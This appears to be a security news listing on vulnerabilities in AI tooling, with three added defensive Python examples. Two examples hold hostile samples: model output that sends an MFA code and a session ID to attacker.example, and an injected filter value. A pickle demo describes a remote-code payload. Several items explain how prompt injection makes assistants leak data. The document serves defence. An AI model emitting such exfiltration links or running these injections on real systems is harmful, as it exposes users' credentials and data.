// #ai-security
19 articles
Microsoft 365 Copilot 'SearchLeak' CVE-2026-42824 — One-Click Exfiltration of Emails, Files, and MFA Codes
Varonis Threat Labs chained three vulnerabilities in Microsoft 365 Copilot into a single attack that exfiltrates emails, corporate files, and MFA authentication codes from a victim's account with a single click on a malicious link. Microsoft patched all three flaws server-side; no client update is required, but the disclosure illuminates the structural risks of embedding AI systems with broad data access into enterprise environments.
The AI Infrastructure Security Deficit: Langflow, LiteLLM, and a Repeating Pattern
Two AI infrastructure components, Langflow and LiteLLM, are both in the CISA Known Exploited Vulnerabilities catalogue as of June 2026, each for command injection in Python-based AI tooling. The pattern reflects a systemic gap: AI infrastructure is being deployed in enterprise environments under procurement and security processes designed for end-user applications, not for server-side infrastructure with network-accessible APIs.
OpenAI Rolls Out ChatGPT Lockdown Mode to Block Prompt-Injection Data Exfiltration
OpenAI has released ChatGPT Lockdown Mode, a security configuration that prevents ChatGPT from loading external URLs, rendering images from arbitrary sources, or executing third-party plugin calls — the primary vectors for prompt-injection attacks that cause ChatGPT to exfiltrate data to attacker-controlled endpoints. Enterprise and education customers can now enforce Lockdown Mode organisation-wide via the admin console.
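The blurb names the three exfiltration sinks Lockdown Mode closes: external URL fetches, images from arbitrary sources, and third-party plugin calls. The mechanism is worth seeing concretely, because any chat front end that renders model output as Markdown or HTML has the same problem: a prompt-injected model emits `![](https://attacker/?d=<secret>)` and the victim's browser makes the request. The following is an added example, not OpenAI's implementation or code from the original page; it is an output-side filter that allowlists hosts (the `ALLOWED_HOSTS` set and the sample model output are assumptions constructed for the demo) and strips every image, link target, or HTML `src` that points elsewhere, returning the blocked URLs for logging.

```python
import re
from urllib.parse import urlparse

# Assumption: the only hosts this deployment allows the client to fetch from.
ALLOWED_HOSTS = {"docs.example.com", "cdn.example.com"}

# Rendering sinks that turn model text into an outbound request from the
# victim's browser: Markdown images, Markdown links, and HTML src attributes.
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*(\S+?)(?:\s+\"[^\"]*\")?\s*\)")
MD_LINK = re.compile(r"(?<!!)\[([^\]]*)\]\(\s*(\S+?)(?:\s+\"[^\"]*\")?\s*\)")
HTML_SRC = re.compile(
    r"<(img|iframe|script)\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"'][^>]*>", re.I
)

# Constructed sample of prompt-injected model output: one legitimate image,
# one zero-size tracking image carrying an MFA code, one poisoned link,
# and a raw <img> tag with a session identifier in the query string.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n\n"
    "![status](https://cdn.example.com/ok.png)\n"
    "![](https://attacker.example/c?d=TOTP%20482913%20user%3Dalice)\n"
    "See the [policy](https://docs.example.com/policy) and "
    "[this reference](http://attacker.example/x).\n"
    '<img src="https://attacker.example/t.gif?sid=abc123">'
)


def url_allowed(url: str) -> bool:
    """Only https to an allowlisted host, or a relative path on our own origin.
    javascript:, data:, and plain http are all rejected."""
    p = urlparse(url.strip())
    if not p.scheme and not p.netloc:
        return True  # relative URL, resolved against the chat UI's own origin
    return p.scheme == "https" and p.hostname in ALLOWED_HOSTS


def sanitize(text: str):
    """Return (clean_text, blocked_urls). Link text is preserved so the
    answer still reads; only the outbound fetch/click target is removed."""
    blocked = []

    def img_sub(m):
        alt, url = m.group(1), m.group(2)
        if url_allowed(url):
            return m.group(0)
        blocked.append(url)
        return f"[image blocked: {alt or 'untitled'}]"

    def link_sub(m):
        label, url = m.group(1), m.group(2)
        if url_allowed(url):
            return m.group(0)
        blocked.append(url)
        return label

    def html_sub(m):
        tag, url = m.group(1).lower(), m.group(2)
        if url_allowed(url):
            return m.group(0)
        blocked.append(url)
        return f"[{tag} blocked]"

    text = HTML_SRC.sub(html_sub, text)
    text = MD_IMAGE.sub(img_sub, text)
    text = MD_LINK.sub(link_sub, text)
    return text, blocked


if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", dropped)
```

The filter is a rendering-side control, so it neutralises the sink rather than the injection itself; it belongs alongside, not instead of, restricting which external content the model is allowed to read. Log the blocked URLs: a query string containing an MFA code or session identifier is direct evidence that an injection succeeded and tells you which conversation to investigate.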
ChromaDB CVSS 10.0 Pre-Auth RCE CVE-2026-45829: AI Vector Database Compromise via HuggingFace Model Injection
HiddenLayer and the Cloud Security Alliance published disclosures of CVE-2026-45829, a CVSS 10.0 unauthenticated remote code execution vulnerability in ChromaDB's Python FastAPI server, on 18–20 May 2026. Attackers can inject malicious code via a crafted HuggingFace-hosted model before the authentication gate fires. Approximately 73% of ChromaDB deployments are internet-exposed. No patch exists for affected versions.
Securing RAG Pipeline Architecture: Vector Databases Are the New Unmanaged Attack Surface in Enterprise AI
The ChromaDB CVE-2026-45829 disclosure exposes a systemic architectural gap in enterprise AI deployments: vector databases used in retrieval-augmented generation pipelines are being deployed without the security controls applied to comparable databases handling sensitive data. The attack surface analysis and architectural recommendations for secure RAG pipeline design apply regardless of which vector database product is in use.
AI Coding Agents in CI/CD Pipelines: Mapping the Attack Surface After Pwn2Own AI Category Results
The Pwn2Own Berlin 2026 AI category results — five products exploited — have a compounding implication for organisations where AI coding agents are integrated with CI/CD pipelines, code repositories, and cloud deployment infrastructure. An exploited AI agent running in a pipeline is not a developer workstation compromise; it is a supply chain entry point.
AI Coding Environments Join Pwn2Own Target List: LM Studio and OpenAI Codex Exploited via Sandbox Escapes
Pwn2Own Berlin 2026 introduced an AI products category and saw both LM Studio and OpenAI Codex exploited on the same day through sandbox escapes and environment variable injection. The results raise urgent questions about the security of AI development tools running inside enterprise environments with access to code repositories, credentials, and production pipelines.
Google GTIG Confirms First AI-Developed Zero-Day Used in Active Exploitation — 2FA Bypass via Automated Vulnerability Discovery
Google's Threat Intelligence Group has confirmed the first documented case of a threat actor using AI tools to discover and develop a working zero-day exploit deployed in a live attack campaign. The target was a 2FA bypass in a widely-used open-source web administration tool. A separate China-aligned actor was also found using AI platforms for automated offensive reconnaissance.
Fake OpenAI Repository on Hugging Face Reached #1 Trending, Delivered Rust Infostealer to 244,000 Users
A malicious repository impersonating an official OpenAI project reached the top trending position on Hugging Face before being removed — delivering a Rust-compiled infostealer to an estimated 244,000 users who executed the repository's loader script. The attack exploited Hugging Face's trending algorithm and the high trust developers place in repositories attributed to the OpenAI organisation. Affected users should rotate all credentials accessible from the compromised machine.
Spring AI CVE-2026-40978 and CVE-2026-40967 — SQL Injection and Filter Expression Injection in RAG Vector Store Components
Two injection vulnerabilities in Spring AI's vector store integration layer affect AI applications using retrieval-augmented generation pipelines. CVE-2026-40978 (CVSS 8.8) allows SQL injection through the CosmosDB vector store component; CVE-2026-40967 (CVSS 8.6) enables filter expression injection in the FilterExpressionConverter used across multiple backends. Both flaws affect Spring AI 1.0.x and 1.1.x and are patched in 1.1.5.
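Filter expression injection in a RAG pipeline is easiest to understand through its consequence: the metadata filter is usually what keeps one tenant's documents out of another tenant's retrieval results, so a value that breaks out of the filter string breaks tenant isolation. The following is an added example, not Spring AI's FilterExpressionConverter or code from the original page. It assumes a deliberately minimal string-based filter grammar (`key == 'value'`, `!=`, `&&`, `||`, parentheses) modelled loosely on such DSLs, parses and evaluates it against a document's metadata, and shows the vulnerable string-formatting builder beside a hardened one that escapes the value and allowlists the key (`ALLOWED_KEYS`, the tenant names, and the injected value are all constructed for the demo).

```python
import re

# Assumed grammar (not Spring AI's):
#   expr     := and_expr ('||' and_expr)*
#   and_expr := cmp ('&&' cmp)*
#   cmp      := '(' expr ')' | IDENT ('==' | '!=') STRING
# STRING is single-quoted; backslash escapes the next character.
TOKEN_RE = re.compile(
    r"\s*(?:(==|!=|&&|\|\||[()])|([A-Za-z_][A-Za-z0-9_.]*)|'((?:\\.|[^'\\])*)')"
)


def tokenize(src: str):
    """Split a filter string into ('op'|'ident'|'str', value) tokens."""
    pos, tokens, src = 0, [], src.strip()
    while pos < len(src):
        m = TOKEN_RE.match(src, pos)
        if not m:
            raise ValueError(f"bad token at {pos}: {src[pos:pos + 10]!r}")
        pos = m.end()
        if m.group(1) is not None:
            tokens.append(("op", m.group(1)))
        elif m.group(2) is not None:
            tokens.append(("ident", m.group(2)))
        else:
            tokens.append(("str", re.sub(r"\\(.)", r"\1", m.group(3))))
    return tokens


class Parser:
    """Recursive-descent parser producing nested tuples as the AST."""

    def __init__(self, tokens):
        self.toks, self.i = tokens, 0

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def take(self, kind):
        k, v = self.peek()
        if k != kind:
            raise ValueError(f"expected {kind} at token {self.i}, got {k}")
        self.i += 1
        return v

    def parse(self):
        node = self.or_expr()
        if self.peek()[0] is not None:
            raise ValueError("trailing tokens after expression")
        return node

    def or_expr(self):
        left = self.and_expr()
        while self.peek() == ("op", "||"):
            self.i += 1
            left = ("or", left, self.and_expr())
        return left

    def and_expr(self):
        left = self.cmp()
        while self.peek() == ("op", "&&"):
            self.i += 1
            left = ("and", left, self.cmp())
        return left

    def cmp(self):
        if self.peek() == ("op", "("):
            self.i += 1
            node = self.or_expr()
            if self.take("op") != ")":
                raise ValueError("expected ')'")
            return node
        key = self.take("ident")
        op = self.take("op")
        if op not in ("==", "!="):
            raise ValueError(f"unexpected operator {op!r}")
        return (op, key, self.take("str"))


def evaluate(expression: str, metadata: dict) -> bool:
    """True if the document's metadata satisfies the filter expression."""
    def ev(node):
        kind = node[0]
        if kind == "or":
            return ev(node[1]) or ev(node[2])
        if kind == "and":
            return ev(node[1]) and ev(node[2])
        _, key, value = node
        return (metadata.get(key) == value) if kind == "==" else (metadata.get(key) != value)
    return ev(Parser(tokenize(expression)).parse())


# Assumption: the only metadata keys callers may filter on.
ALLOWED_KEYS = {"tenant", "classification"}


def build_filter_vulnerable(tenant: str) -> str:
    """The bug class: an untrusted value pasted into the filter DSL string."""
    return f"tenant == '{tenant}'"


def quote(value: str) -> str:
    """Escape backslash and quote so the value is always one string literal."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_filter_safe(key: str, value: str) -> str:
    if key not in ALLOWED_KEYS:
        raise ValueError(f"key {key!r} not permitted in filters")
    return f"{key} == {quote(value)}"


# Constructed: a document belonging to another tenant, and an injected value.
OTHER_TENANT_DOC = {"tenant": "globex", "classification": "internal"}
INJECTED_TENANT = "acme' || tenant != 'x"
```

With the injected value, the vulnerable builder produces `tenant == 'acme' || tenant != 'x'`, which matches every document whose tenant is not literally `x`, so retrieval returns other tenants' content; the escaped form stays a single literal and matches nothing. The deeper fix is the one Spring AI's patch points to: pass filter values through a structured builder API rather than formatting them into a string, and derive the tenant from the authenticated session rather than from request input at all.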
AI Agents Can Autonomously Compromise Cloud Infrastructure With Minimal Human Oversight, Research Finds
New academic research demonstrates that AI agents equipped with common cloud security tools can autonomously identify, chain, and exploit misconfigurations in production-like cloud environments — achieving lateral movement, privilege escalation, and data exfiltration in multi-step attack sequences without human guidance. The findings have direct implications for red team methodologies, cloud security posture management, and the adversarial use of AI-assisted attack tooling.
Hugging Face LeRobot CVE-2026-25874 — Critical Unpatched RCE via Pickle Deserialization in Unauthenticated gRPC Endpoint
A critical unpatched remote code execution vulnerability in Hugging Face's LeRobot robotics AI framework allows unauthenticated attackers to execute arbitrary code on any server running the gRPC control interface. CVE-2026-25874, rated CVSS 9.3, affects the project's dataset loading and remote control pipeline via Python pickle deserialization. No patch is available; mitigations focus on network isolation.
LMDeploy RCE Vulnerability CVE-2026-33626 Weaponised in the Wild 13 Hours After Disclosure
A critical remote code execution flaw in LMDeploy, a widely used LLM inference serving framework, was exploited in active attacks just 13 hours after public disclosure. Organisations running self-hosted AI inference infrastructure must treat these platforms with the same urgency as any internet-exposed web application server — because attackers already do.
KTransformers AI Inference Framework Exposes Unauthenticated RCE via Pickle Deserialization — CVSS 9.8
CVE-2026-26210 is a CVSS 9.8 pre-authentication RCE in KTransformers, a popular AI inference acceleration framework. The scheduler's ZMQ ROUTER socket binds to all interfaces with no authentication and deserialises arbitrary pickle payloads — any network-reachable host can execute code on the inference server.
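The LeRobot and KTransformers items above are the same bug class: a network-reachable endpoint hands received bytes to Python's `pickle.loads`, and unpickling will import and call whatever the stream names. The following is an added example, not code from either project or from the original page; it makes no assumption about their wire formats. It shows why the vulnerable handler is remote code execution (a constructed payload whose `__reduce__` names `os.getpid`, chosen so the demo is harmless; a real payload names `os.system`), then two layers a receiver can apply if it cannot yet drop pickle: a static opcode scan that rejects any stream containing import or call opcodes, and an `Unpickler` whose `find_class` refuses every global not on an allowlist.

```python
import io
import os
import pickle
import pickletools


class AttackerObject:
    """Constructed stand-in for an attacker's payload. Unpickling calls the
    callable returned by __reduce__ with the given arguments."""

    def __reduce__(self):
        return (os.getpid, ())  # a real payload would use os.system or subprocess.Popen


# Constructed sample messages, as they might arrive on an unauthenticated socket.
MALICIOUS_PAYLOAD = pickle.dumps(AttackerObject())
BENIGN_PAYLOAD = pickle.dumps({"request_id": 7, "tokens": [1, 2, 3]})


def vulnerable_handle(raw: bytes):
    """The bug class: bytes from the network go straight into pickle.loads()."""
    return pickle.loads(raw)


def demo_vulnerable() -> bool:
    """True if the attacker-chosen callable executed inside this process."""
    return vulnerable_handle(MALICIOUS_PAYLOAD) == os.getpid()


# Opcodes that import a global or invoke a callable during unpickling.
# Plain containers of str/int/float/bytes never need any of them.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ",
                "NEWOBJ_EX", "REDUCE", "BUILD"}


def contains_code_opcodes(raw: bytes) -> bool:
    """Static pre-check that never executes the stream."""
    return any(op.name in CODE_OPCODES for op, _arg, _pos in pickletools.genops(raw))


class UnsafePickle(ValueError):
    pass


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup; extend ALLOWED only with known-safe types."""

    ALLOWED = set()  # e.g. add ("numpy.core.multiarray", "_reconstruct") only if required

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise UnsafePickle(f"refusing to import {module}.{name} from untrusted pickle")


def safe_handle(raw: bytes):
    """Defence in depth: reject on opcode scan, then unpickle with no globals."""
    if contains_code_opcodes(raw):
        raise UnsafePickle("pickle stream contains import/call opcodes")
    return RestrictedUnpickler(io.BytesIO(raw)).load()


if __name__ == "__main__":
    print("vulnerable handler ran attacker callable:", demo_vulnerable())
    print("benign payload accepted:", safe_handle(BENIGN_PAYLOAD))
    try:
        safe_handle(MALICIOUS_PAYLOAD)
    except UnsafePickle as exc:
        print("malicious payload rejected:", exc)
```

The restricted unpickler is a containment measure, not the fix: the fix is a schema-validated format (JSON, msgpack, protobuf) on the wire, the socket bound to localhost or a private interface rather than all of them, and transport authentication (for ZMQ, CURVE keys) in front of it. The opcode scan is also a useful hunting check for pickles already at rest: anything with `STACK_GLOBAL` or `REDUCE` in a file that should only hold tensors deserves a look.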
Marimo AI Notebook RCE CVE-2026-39987 Exploited at Scale — 662 Events in Three Days, NKAbuse Malware Deployed
CVE-2026-39987 (CVSS 9.3) in the Marimo Python notebook has been weaponised at scale, with Sysdig recording 662 exploitation events over three days and attackers completing credential theft within minutes of gaining access. The unauthenticated WebSocket RCE is being used to deploy NKAbuse, a multi-platform malware using the NKN peer-to-peer network for command and control. Upgrade to Marimo 0.23.0 immediately.
Anthropic's Claude Mythos AI Discovers Thousands of Zero-Days Across Every Major OS — Project Glasswing Offers Private Access
Anthropic's specialised vulnerability-hunting AI, Claude Mythos, has systematically discovered thousands of zero-day vulnerabilities across Windows, macOS, Linux, and major browsers — including a 17-year-old NFS RCE in FreeBSD and a 27-year-old OpenBSD denial-of-service. Project Glasswing provides private early access to Microsoft, Google, Apple, and select others. The implications for enterprise risk governance are immediate.
Cohere Terrarium AI Sandbox Escape — CVSS 9.3 WebAssembly Flaw Allows Root Code Execution on Host
CVE-2026-5752 (CVSS 9.3) in Cohere Terrarium allows an attacker to escape the Pyodide WebAssembly sandbox via JavaScript prototype chain traversal, achieving code execution as root in the host Node.js process. Organisations running AI code execution environments should patch immediately and network-isolate these workloads.
Langflow RCE CVE-2026-33017 Exploited Within 20 Hours, Added to CISA KEV
A critical unauthenticated remote code execution vulnerability in Langflow AI pipeline builder was exploited in the wild within 20 hours of disclosure, with attackers harvesting API keys for OpenAI, Anthropic, and AWS from compromised instances. CISA added CVE-2026-33017 to the Known Exploited Vulnerabilities catalogue on 26 March, making patching mandatory for US federal agencies.
TeamPCP Backdoors LiteLLM on PyPI — AI Gateway Package With 3 Million Daily Downloads Compromised
The LiteLLM Python package — a widely-deployed AI gateway library with three million daily downloads — was backdoored on PyPI on 24 March by threat actor TeamPCP. Malicious versions 1.82.7 and 1.82.8 deployed a three-stage payload stealing cloud credentials, Kubernetes secrets, and CI/CD tokens from any system that installed the package during a 40-minute window.
Commentary tagged #ai-security
AI Vector Databases Are the New Attack Surface Nobody Inventoried
ChromaDB CVE-2026-45829 is a specific vulnerability in one product. The underlying problem it exposes is structural: enterprise AI deployments are creating new categories of sensitive data storage that are not subject to the security controls applied to comparable databases. The vulnerability is fixable. The architectural gap is not fixed by a patch.
CipherWatch Editorial
Security Intelligence Platform
AI at Pwn2Own Is an Admission: These Tools Were Never Secure
The addition of an AI products category at Pwn2Own Berlin 2026 — and its immediate success with five exploits across three vendors — is not evidence that AI tools are newly insecure. It is evidence that the security industry has finally started looking. The results are a lagging indicator of what has been deployed in enterprise environments for the past two years.
The Risk Calculus Changed Today
Google's confirmation of the first AI-developed zero-day used in live exploitation is not a warning about the future. It is a statement about the present. The security industry's habit of treating AI-assisted exploitation as a 'horizon threat' just ran out of runway.
AI Platforms Inherited the npm Trust Model and Its Problems Are Arriving on Schedule
A fake OpenAI repository reached #1 trending on Hugging Face and delivered an infostealer to 244,000 users. This was predictable. The AI/ML developer ecosystem adopted the open-publishing, community-trust model of package registries without adopting the hard-won security lessons those registries learned over the past decade. The attack surface Hugging Face presents in 2026 looks remarkably like the attack surface npm presented in 2016.
AI Didn't Make Attackers Smarter — It Removed the Barrier That Was Keeping Them Small
DPRK's AI-generated npm malware campaign is not remarkable because AI made it more sophisticated. It's remarkable because AI let a small team produce something that would previously have required many more people to build and maintain. The scale constraint on supply chain attacks has just changed fundamentally.
The Model Context Protocol's Security Debt Is Already Piling Up
MCP's rapid enterprise adoption has outpaced its security design. The protocol was built to solve an integration problem, not a security one — and the debt is accumulating faster than the ecosystem can audit it.
The 13-Hour Problem: Your AI Inference Infrastructure Is Already a Tier-One Target
LMDeploy was exploited 13 hours after its RCE vulnerability was disclosed. Langflow took 20 hours. Marimo lasted days. The pattern is not bad luck — it is the predictable consequence of treating AI inference infrastructure as development tooling while exposing it like a production web server. The window for getting ahead of this has closed.
AI Inference Frameworks Are a First-Class Attack Surface — and Most Enterprises Are Treating Them Like Research Tools
Two critical AI inference framework vulnerabilities disclosed this week — one exploited within 13 hours, one scoring CVSS 9.8 — reveal an uncomfortable truth: the AI toolchain has become enterprise infrastructure, but most security programmes are still treating it like a research curiosity. That gap is now being actively exploited.
The Hallucination Problem in Your AI Security Tools Is Not Getting Fixed
A new paper by Vishal Sikka and Varin Sikka uses settled computational complexity theory to prove that transformer hallucinations and fixed reasoning depth are architectural facts, not engineering failures. For security practitioners building operational dependencies on LLM-based tools, the implication is uncomfortable: the limitations most vendors are implicitly promising to train away cannot be trained away. They are proven.
AI Has Learned to Find Bugs Faster Than We Can Fix Them
Claude Mythos discovering thousands of zero-days confirms what was already theoretically obvious: AI vulnerability research is orders of magnitude faster than human-paced remediation. The industry's response — private disclosure programmes — is a delay mechanism, not a solution to the structural asymmetry between discovery speed and patch deployment speed.
AI Infrastructure Is Accumulating Security Debt Faster Than Anyone Admits
Langflow's actively exploited remote code execution vulnerability and this week's LiteLLM supply chain attack are not isolated incidents; they are early symptoms of an ecosystem that has scaled faster than its security practices. Organisations deploying AI infrastructure are inheriting technical debt they have not yet been asked to account for.